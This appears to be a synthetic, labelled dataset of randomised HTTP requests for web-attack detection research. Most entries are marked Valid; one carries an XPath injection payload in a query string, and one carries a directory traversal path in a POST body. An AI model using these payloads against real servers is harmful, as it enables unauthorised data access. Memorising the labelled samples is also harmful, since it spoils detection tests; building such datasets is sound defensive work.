GET /hR3am/4oRtuv/UJb6@Tetc/om3nwgcE/nQsIgxYu.WDm/iwLcC@mnmogr/JpT/ilFR3bq5IjC8.htm?qoihewmaofx0em=h4nEaethon+erdeOTpO&5tizomatoto=l+&1wk1V.=trk+%7EinputdfOlpvt&mtdfrumph7U=%3F7 HTTP/1.0
Host: www.eclrshOeg.cz:7079
Connection: close
Accept: video/mpeg;q=0.2, application/*;q=0.8
Accept-Charset: hz-gb-2312, euc-cn;q=0.3, x-mac-korean;q=0.9, iso-8859-8-i
Accept-Encoding: deflate;q=0.2, compress;q=0.6, gzip, deflate;q=0.8
Accept-Language: ee4taelh-2tnznems, iigr-swrot8oc;q=0.2, e-s;q=0.7, rt-snl;q=0.5, u9baoe-rmht3sco
Cache-Control: no-store
Client-ip: 115.41.215.171
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Tue, 20 Dec 05 13:51:21 UTC
ETag: W/"hRKr@QzFOCPSej2VzYnZ"
Expect: 8ref
From: Allouc@sein.uk
If-Modified-Since: Sat, 28 May 05 09:45:45 UTC
If-Unmodified-Since: Tue, 01 Jul 08 10:21:10 UTC
If-Match: *
If-None-Match: "fL4LeBz4p9rCR4wOX9Y"
If-Range: "iumFlG3.IybZ15DKMTN"
Max-Forwards: 1527
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: NTLM aTB0c2FwdWFvYjJlckV1RXByZWV3Y2xrdmgzb3lyN3NPc2xmb2Z0aGU5Zmlk
Range: -388719
Referer: http://www.Eelsonc.net/elIce8e/qhaReu/af0y0r/gtiosrio.php4
TE: gzip;q=0.7
Trailer: If-Range
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 5.6; th-9s; rv:8.6.0) Gecko/21821901
UA-CPU: Sparc
UA-Disp: 913,006,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3795x126
Via: 4.3 213.62.182.8
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 428 www.goonyzo.tiff "hcaieedel5rnisnz" "Thu, 25 Dec 08 21:20:26 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 19975103702041992
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31305
Start - Id: 34383
class: Valid
POST /r.YVpQ8o4p-ZCBn/eaxjvbosTd1een1nt2/AJFr6iDhtpassxp_6/aHDmc@qj2CN/rOv2yGrm-mail-/ecEtsXitsEd/o5UztThHLnWOdua/lBjrbIsloI2UgS/rvR_fE47u06.Zrp7/s2Pb_aO4nMGgYzTpmC.bin? HTTP/1.0
Content-Length: 138
Content-Language: Detene7,WyaZr2i
Content-Encoding: compress
Content-Location: /7DoiVei/pd4vnu.aspx
Content-MD5: b2thbHNtQWZmaE9laXJsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Dec 04 21:04:50 UTC
Last-Modified: Sat, 27 Nov 04 04:00:12 CET
Host: 175.155.17.47:007
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.6, gzip
Accept-Language: exCrt-yi, seeorid-herEiw0t, N-lnaf, r-xsot, aqo-i;q=0.5
Cache-Control: min-fresh=0179
Client-ip: 135.87.113.152
Cookie: lahfdNugsTltee=1lzktof
Cookie2: $Version="524"
Date: Wed, 14 Sep 05 06:44:00 CET
ETag: W/"2XTGxtvNtQS07di_dd"
Expect: coehc
From: t2ao3Tim@5hsAsESuu.biz
If-Modified-Since: Mon, 21 May 07 02:37:08 CET
If-Unmodified-Since: Tue, 15 Feb 05 20:40:27 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Dec 06 11:05:04 CET
Max-Forwards: 2816
MIME-Version: 7.0
Pragma: n=tde
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic cnVMaGk6aWVlMQ==
Range: 369-272,49-76042
Referer: http://www.tikophOs.gov/ajuapnnd/aueHno8a/ehRsyoh.msf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.2 (Windows; U; Win 9x 5.9; yw-la; rv:7.4.5) Gecko/14835943
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 015x732
Via: HTTP/2.0 www.rHvtaNa.htm:079, FTP/1.4 www.itarote.gif, FTP/6.5 www.oze8bp.js
Transfer-Encoding: deflate
Upgrade: hel/4.7, fZt/1.0, fhio/0.4, psutsa/0.4, YhVAtt/6.7
Warning: 677 229.121.18.11 "Uhwoabeh" "Mon, 27 Aug 07 06:46:16 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~

ftBeptip0=5553&io=zbR.iMk&s9Le5seci1im= erevt%N eewp-4a2&mOroE=89870&S@Ne7.R=aX-_fBEH7G8&avhs1i8lgttts=eeu8preplacepyuebodyd&li4nmcl=520

End - Id: 34383
Start - Id: 20515
class: Valid
GET /5n8SHrTjhvi0i.png?itpAiaE70hX=msiae6ktyhiy%7Ea&mruotslsegCra=cAqREims&rhnlesaonmoe=+irhdeletefteuat&execiwXKtApea=60032&ulp9seteo8b=atazancifawafjoa&rtnEthaIjtahti=6957&7@AEw.lswtPphp=ua&rA6TNeeebroe=iG6N%40W&7se=dSNN&u.s@4JJ=5896332 HTTP/1.1
Host: 41.222.217.144
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.5, cp-932, iso-8859-9, iso-8859-1
Accept-Encoding: identity;q=0.5, deflate, compress;q=0.5
Accept-Language: o6-tze;q=0.1, r-ryiesdr;q=0.2, mY0ctHwi-rehkasfb, p671eu8-le9f;q=0.8
Cache-Control: only-if-cached
Client-ip: 84.84.100.25
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="24"
Date: Tue, 01 Jan 08 20:30:07 UTC
ETag: "6S8bQj.V8fdx.K6"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Thu, 11 Oct 07 16:00:49 CET
If-Unmodified-Since: Sun, 28 Jun 09 14:29:29 CET
If-Match: *
If-None-Match: "hxXm-0JNoxhAUt7"
If-Range: "AKuWP9KlwYj..yhN"
Max-Forwards: 8
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Basic b2lhbzphc2lvOQ==
Range: -6,89-60
Referer: http://www.shotyet.fr/sdRyoe80.mdb
TE: trailers
Trailer: Connection
User-Agent: rds8axtae5eaessueHE
UA-CPU: StrongARM
UA-Disp: 027,9138,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5447x066
Via: 2.1 191.177.151.23, 4.4 21.39.193.242
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20515
Start - Id: 32452
class: Valid
GET /ffziTpFCU-E/3jP_AUOFmY.MoiFSw-/tLGb9-i8T/aIsim/acHHglOowr/Aimepymeoeoiluo/ncoNhe6xatroy/orn4e0Tohre/tI/d1xGX.html?gsnyty=36&liN=05754997&etaee=mHEc&nMaegdbexlf=i3le%7Eef%7E8mbsock_streamsaformueede&n5nknoin=2xUdHQHQ&ocsnu6zn=kXqPQE5E&tettArelrt=m&hhnrAtmFi4cg=lTImV&z3o=iUlewEfhenio4&5thm=itu&noratmll=htacceshe1notinsNta&mivntEmnspsKre=0287337&nhsigN=mC-hv HTTP/1.0
Host: 35.195.109.178
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sareidit-lsaya, ndasua-to, 726vokhi-xzOnL1
Cache-Control: sdta7weu=uteonN4
Client-ip: 145.133.185.131
Cookie: Tsshutdown5= oiiexecioyUmu;beterara=a8R7a4stRpab5stt6;nzfEg=znyO<uaefes;IlOhnrt=DntnAntgnegaAf
Cookie2: $Version="20"
Date: Tue, 22 Dec 09 11:58:17 UTC
ETag: "L@hxhH-RK5Ql4dG7"
Expect: qoopza
From: euedYotd@rhStwtetaa.biz
If-Modified-Since: Fri, 17 Apr 09 01:57:48 GMT
If-Unmodified-Since: Sun, 02 Aug 09 07:15:18 GMT
If-Match: "T1knbAeKQAZsPBa2I1"
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic bGVpRjpwZWFoZThvcw==
Authorization: Basic dGl0ODV0OnRxSTRhZnQ=
Range: -8,-09,-81094
Referer: http://www.ctttrq.st/eead4h.conf
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.2 (compatible; Konqueror/5.7; Unix; a4nieo; OAeohooee)
UA-CPU: 68000
UA-Disp: 724,9778,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2914x4249
Via: 0.8 www.heeGnka.css:339
Transfer-Encoding: gzip
Upgrade: oyi/6.4, eAjae/0.5, yst/5.6, zs8c/0.9
Warning: 120 www.torwc6.shtml "mpfdt" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 498430516036969
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32452
Start - Id: 16510
class: Valid
GET /PNcDebTsy95bintelnet/raocmErqoez/eB9hjro/aLGbtIZK9mNHdXV_kEH/oHcpOeWebeOrv/f22/sn5mns4npbtLeesp2/d2kN/25mqGiaygFey7/imsl.gif?a2tesKAhsnhs=%3Ehfrom7&d9ula=66&eea=si6ie2Idul&Mds5=xIFs&ysatzaoeDra=eed_ HTTP/1.1
Host: 78.58.72.35
Connection: wvlob
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: ud=6lt
Client-ip: 74.241.75.79
Cookie: l4k4zoh=80@sv1EF;Twa5oN=efa;decdt90=9
Cookie2: $Version="74"
Date: Wed, 17 Aug 05 13:22:30 CET
ETag: "Xun9jE_1fsF7tswH4F0X"
Expect: odss=htsSa
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 03 Nov 07 15:10:00 GMT
If-Unmodified-Since: Tue, 19 Dec 06 21:34:11 GMT
If-Match: *
If-None-Match: "mTjMuq--DsW93P0MC5Bj"
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 552
MIME-Version: 0.2
Pragma: nswhA4l='t4a'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: NTLM cnR1bWQ5RW9oYW5lZWtwY25vdmVzbmllemhvc3duZXRQcnRuYWVpdG9l
Range: 90-3929,2123-,048886-
Referer: http://eoobo0i1.cz/8nAg/e2c9tg/ihscn.gif
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/6.8 (Windows; U; WinNT 7.9; qa-ne; rv:5.5.5) Gecko/51843147
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 950x803
Via: 8bo/2.5 www.Naht.gif, HTTP/4.4 www.eiwR.css
Transfer-Encoding: identity
Upgrade: doc/7.0, ari/9.3, s1yrm/6.9
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 9917949
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16510
Start - Id: 23251
class: Valid
GET /ACYkrs4JwQ/oIdoe71wMNy0oecs/nxecrHn/rntd1/Einricieeuecuide.msf?Ro=ieM&ctesrZsd=2&eetmeoeRdmec=nph-+&mCsr1eorzzit2si=a&esl=oUs01pqvID&rhotbtnir=37&2epnbnug8y=onxz%3F+e+h0hewneA%3Bhtpassaccess_log&UcrV=gFpF HTTP/1.0
Host: 8.142.194.66
Connection: keep-alive
Accept: video/*, text/html, audio/basic;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.3, hz-gb-2312, x-mac-greek;q=0.8, x-mac-japanese;q=0.2, macintosh
Accept-Encoding: compress;q=0.6, identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 42.166.49.181
Cookie: allOm@D=52;asha5y=5279096;dTViJA=15;ucesnRcgo=tc3ossIy&mb;tiefel=\:awdacen;y0UorEma0wo=7546449429
Cookie2: $Version="0"
Date: Fri, 06 Feb 04 01:19:33 CET
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: sebe@tnldorehze.de
If-Modified-Since: Sat, 21 Apr 07 15:06:36 CET
If-Unmodified-Since: Thu, 16 Jul 09 04:27:30 UTC
If-Match: *
If-None-Match: "oufdClgxZwNbpw60O8bj"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: NTLM aGVycmliaXRycGllZTh3czhhYm5vc21zZW1zb25ndEVsZWthN3VsdG9rYTFucGhl
Range: 3-988
Referer: http://himn.it/aebahhk/udopfe/ex21il1w/nlatea.php3
TE: trailers
Trailer: Connection
User-Agent: oRoo6AxR http://www.Odgee.org
UA-CPU: StrongARM
UA-Disp: 831,695,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: 4.3 53.107.117.96
Transfer-Encoding: usgehu; roO3=tt1ls
Upgrade: bcs/8.9, hdisiy/6.8
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 045569580616206660
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23251
Start - Id: 15606
class: Valid
GET /eLks7@9_q5RE/@cSkjwwgetR8/6.ePm_jQbgXP_qJ/hurassiipu/nBd-qtw7@0oh/7VconnectK5UpUYcyFY/ewndsolet/tg.MQtMo699HpQH.php4?GfrVfDzB=%7E%7E%2Fa&ns8uiR0rpioop=3391912679&ol=wvEsrhnnin&gqh1dn=2512&6aicct=kw%40QnEY-Ej8&2tgtndtcn=75188261&nnayrTscen=H%2Bhhel%3Fade+5&rzaeDwswnh4=Ne HTTP/1.1
Host: 39.141.8.107
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 120.213.203.8
Cookie: kb=0007651;o0h8dnMnheeaia5=a.7;dasu=e7ref%h 6nph-et1ot;2objectSU4tybQ1-=n0iE2ttsole;hs5i=27265654;ni6ao=8
Cookie2: $Version="962"
Date: Fri, 01 Sep 06 06:31:46 CET
ETag: "h2ZBzGpTvy6VeGBY6A99"
Expect: 5EKt9
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Fri, 27 Nov 09 02:59:04 UTC
If-Unmodified-Since: Sat, 17 Apr 10 16:36:19 CET
If-Match: *
If-None-Match: *
If-Range: "YgibCwHGx1pdSSq0R"
Max-Forwards: 2
MIME-Version: 8.8
Pragma: kvoaDe=1rT
Proxy-Authorization: vrynOe rp7b=4e4ltho
Authorization: psltiV egca8zen=tdad
Range: 713-,63505-263305,-5
Referer: http://ccghgf.net/dsaf.php
TE: gzip;q=0.4,trailers,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/2.1 (Machintosh; U; Mac OS X 2.8; ss-ce; rv:4.7.7) Gecko/74157716
UA-CPU: x86
UA-Disp: 6997,2837,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: FTP/5.9 www.nwicE.htm
Transfer-Encoding: gzip
Upgrade: nf3md/6.5, bsKfsn/9.5, irEtZw/7.8, onhm/8.4
Warning: 527 23.111.131.67 "talhHnbs0" 
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15606
Start - Id: 5168
class: Valid
POST /eeu9ttsf/yixaueretnanoDevu/xtYfPGz-/te4@nNy@hW/lAncSB/tECEAtOkHeTEItQml.mspx? HTTP/1.0
Content-Length: 264
Content-Language: Choc,db7M
Content-Encoding: identity
Content-Location: http://www.13RtE4g.ch/ntaa/Te8itIb/tnocsa.mpeg
Content-MD5: dGRhRHNuc2FuaW50dG5lNg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jun 07 19:51:31 UTC
Last-Modified: Sun, 18 Jan 09 15:40:13 UTC
Host: 207.18.113.236
Connection: keep-alive
Accept: video/*, text/*
Accept-Charset: shift_jis;q=0.0, big5;q=0.0, iso-2022-kr, iso-8859-4
Accept-Encoding: 
Accept-Language: k-if, 1agm-iiithpd;q=0.5, oocad-m
Cache-Control: joIoE='v2neWa9'
Client-ip: 73.76.159.247
Cookie: ee=ablpemeejnneri;ohdg=7b;hh=164;ea=437845012
Cookie2: $Version="249"
Date: Wed, 24 Feb 10 14:18:53 UTC
ETag: W/"yyvxIosvhKi7Qigv"
Expect: 100-continue
From: ehsAelee@StuNsq.it
If-Modified-Since: Fri, 11 Sep 09 24:03:11 CET
If-Unmodified-Since: Sat, 26 Nov 05 06:27:38 CET
If-Match: "34He-EJj.5BLf7s3h8P"
If-None-Match: "wnq2s4bsFZKuvO1"
If-Range: "yXGBHHN3JzForI5"
Max-Forwards: 097
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: vhRa uhTS=vEthr
Range: 933-2,0501-
Referer: http://3hce.ch/c4Ohetss.php4
TE: gzip,deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: Mozilla/1.6 (X11; U; Open BSD i586 0.7; fn-oe; rv:3.0.6) Gecko/32013248
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 938x1515
Via: FTP/0.1 www.lEftaet2.shtml, FTP/0.1 116.253.154.114
Transfer-Encoding: identity
Upgrade: 726/5.4
Warning: 340 www.enzW.gif "w3mBIw" 
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c0otlbho=392583750&0lmstfoh3orctad=hmx-Z&cta31=ap&c6Xz1g8I=en&swymeorda=53340&n7pDoscqeou=acszS-HN&aweermlo=]sJNupdate&tniasd=gDvPF&t3DlwvoF7N=aS@U7UR&ko=d.5&IwAebsieOmoeho=wNzyg&retds=6mm&-crmp0adxewindow.openNNW=ihtpassaeaE&stmg3bnersdhe=n9h&O6wwi=i839dih9hi

End - Id: 5168
Start - Id: 35841
class: XPathInjection
GET /waHmWnjfkmFeYVm/dCTTix0h4Y@qjjU/pedB@HTB7ZxT/uirebsm.shtml?tie1tEaT9fleci8=h6fE&wcmeeea=9191&ah=passthrui&F84=Nbh&-ncdfwhere6tinsertEZlinkR=ira0dtelnet%3AAlestyleadminawindow.opent0%3Em&eofnivt2au=2&5hrozg=mhoknrr%27++++or+1%3C++++i4%2Fehohn%2FaiA%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D226%5D+or+++%27vvaeiotN%27++++%3D%27&dhEgyEei66I0aEf=i%7Cttivssgn1&haoilmb=9+swgete&it1edsnmgTFete=ukai&ee2dretra=rosam%2B%26%280sdltscva&duefsnfaunbsne=305751&D_uynL@etYN=2389063&rtuheam3eurS=1 HTTP/1.1
Host: www.f7el.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.5, ks_c_5601-1987;q=0.8, x-mac-korean;q=0.8, gb2312
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Tue, 13 Jan 04 02:47:38 CET
ETag: "aq3Kr@.usbQW67kgtl"
Expect: sc2nG
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Tue, 15 Dec 09 22:43:48 CET
If-Unmodified-Since: Sat, 13 Mar 10 02:51:36 GMT
If-Match: *
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 33
MIME-Version: 8.2
Pragma: Nr='jxxc'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Digest username="4dg6s4u"
Range: 77-,-9
Referer: http://ia9scga4.org/Kenos1/dTalAeLa/mhkewuu/bgpe.php4
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 6.5; sh-mn; rv:3.1.8) Gecko/76137275
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Pixels: 4135x5853
Via: 9.0 www.rrm6etit.jpg
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35841
Start - Id: 14944
class: Valid
GET /4yKZgooUpcixCpPF2QF_.php3? HTTP/1.0
Host: 215.62.194.1
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 66.99.216.164
Cookie: smdeiner4w1o2fo=rge1mdjVeoo;op9e5e=~fot;@Rq-=iHp3cincxtJisu;tl=5
Cookie2: $Version="3"
Date: Sat, 19 Feb 05 05:52:12 CET
ETag: W/"kdiwTp.YCWcPegg9.8"
Expect: srnezai8=efakSfn1;grs69mqp
From: hyusCat@gshWelhtl.uk
If-Modified-Since: Sat, 01 Jan 05 15:27:38 UTC
If-Unmodified-Since: Tue, 07 Feb 06 10:49:20 GMT
If-Match: *
If-None-Match: "ErAIgdRU7byerrQNEM"
If-Range: "yFZaFkN.o-Uxxl4Txd"
Max-Forwards: 7
MIME-Version: 0.2
Pragma: tyqtda='rh5s'
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Basic b2tmb2g6ZmV0c2l5
Range: 19024-74,-1374,-1
Referer: /hLjrtizA/kHrb8r/aimubilo/koituej/s8esthuh.dll
TE: trailers,deflate,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/6.9 (Windows; U; Win98 7.1; xe-ei; rv:9.1.4) Gecko/12149162
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8266x800
Via: re8qn6/7.2 www.rsaRg.htm, 7.9 www.aar8ixr.htm
Transfer-Encoding: gzip
Upgrade: nneot/1.0, iar/1.4
Warning: 920 www.4stno.html "3fzsoa8stoh11" "Wed, 04 May 05 04:08:13 GMT"
X-Forwarded-For: 120.240.133.60
X-Serial-Number: 51313390873628125654
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14944
Start - Id: 30224
class: Valid
GET /oood6hlr.jpg?nodefromhrl=7715149&eau=e7tui+evarueeuar%3Asi&4Z.psAgxlikeS=%24oyf&ultoa=%5DaeteIashtiytt%5C&tleeesnsotrt=550177&jlFrG4XBU=eaai%5Csabolibeaam&bvhdn7=068738&uQstdinzLxtermN=-positionn&awlu=eea&yuqvep=iiu5&Q_bET_=482280&tSZ3Uozz=c+Dl0%2977soO%5BtsO HTTP/1.1
Host: 93.67.237.61
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=00029
Client-ip: 39.106.231.60
Cookie: 4oeEsuXi=ahq;bacoll=3888794;qa1gUrj=ppposition
Cookie2: $Version="0"
Date: Sun, 05 Dec 04 18:42:55 UTC
ETag: W/"qZR5zHuy_j.jpzx"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Tue, 04 Sep 07 03:29:24 CET
If-Unmodified-Since: Fri, 10 Apr 09 03:09:54 GMT
If-Match: "QKlCEZfF874wmitrk"
If-None-Match: *
If-Range: "4Y4kR3J-bo0pvhz"
Max-Forwards: 1782
MIME-Version: 2.9
Pragma: FA='to'
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: NTLM ZzdCZGd6MHVSc29ubXRlY29kZ2xCaWVvYWl4cmRlcnNvaQ==
Range: 346642-698,469-394,8-
Referer: http://m9h5ii.be/gltyO/ngtst.js
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: Mozilla/2.3 (X11; U; Linux i586 4.6; c4-uc; rv:7.8.1) Gecko/23892134
UA-CPU: PowerPC
UA-Disp: 058,5611,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8300x7095
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 73.235.101.244
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30224
Start - Id: 45405
class: PathTransversal
POST /hqpRe-2Vr@f7kS/3mQJA3GLRuVrcce2o/ofptrmR4pslent2/urmsyi.tiff? HTTP/1.0
Content-Length: 105
Content-Language: ehtr
Content-Encoding: identity
Content-Location: /tT5cr/sunq/6tes6.msf
Content-MD5: ZHRMb2Vkc2FpbWdlaWxTdw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 18:50:20 GMT
Last-Modified: Wed, 22 Mar 06 20:43:01 UTC
Host: www.rHea8rece.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i, x-mac-greek
Accept-Encoding: 
Accept-Language: 3tt-5o, isht-esrit, at-vlItpE
Cache-Control: no-transform
Client-ip: 204.131.31.4
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="27"
Date: Fri, 16 Nov 07 14:07:49 UTC
ETag: W/"VCORCTrRhO2WKCTHsr"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: "is5.OAWIIPMufqKrAkWQ"
Max-Forwards: 57
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: qei4S 0e1e=mede
Authorization: a4Eja aO53=lrnwidtl
Range: 50-63221
Referer: /e8u7aIF/isoaiw.mspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: vsnpsr
UA-CPU: MIPS
UA-Disp: 8137,5166,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: HTTP/3.9 www.Yeosvebe.tiff
Transfer-Encoding: nl5ei
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

v2hstHco=eoCmMBBHb5A&pe=/../../../Inetpub/iissamples/litrnima/istrlara/allindrila/la.sh

End - Id: 45405
Start - Id: 24657
class: Valid
GET /iFMU-i5hdm700TI/cFJK2dr4HrwULeCenJ/0ieenowa.tiff? HTTP/1.0
Host: 72.62.35.211
Connection: Tge8h
Accept: text/*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 252.174.24.134
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="3"
Date: Thu, 02 Nov 06 06:47:54 GMT
ETag: "i.7Yq1YoQK.eJPxQ_v"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Fri, 16 Apr 10 17:29:26 GMT
If-Unmodified-Since: Tue, 13 Mar 07 18:05:50 CET
If-Match: *
If-None-Match: "Rb49Ig_wj9bEngNLO"
If-Range: *
Max-Forwards: 8390
MIME-Version: 3.5
Pragma: Ls='b94eewr'
Proxy-Authorization: Asws oa5d=buerH
Authorization: Digest uri=http://www.gathnS.gov/ai2dt/ea6nOib/seGe/jiiaept.css
Range: 7216-
Referer: /nbet/dEaieube/eej8/lnNT.gz
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.7 (compatible; uncaE; Windows NT; tosNvatl; ieT3rn)
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 578x008
Via: 2.6 165.228.149.61, HTTP/7.4 239.176.255.226
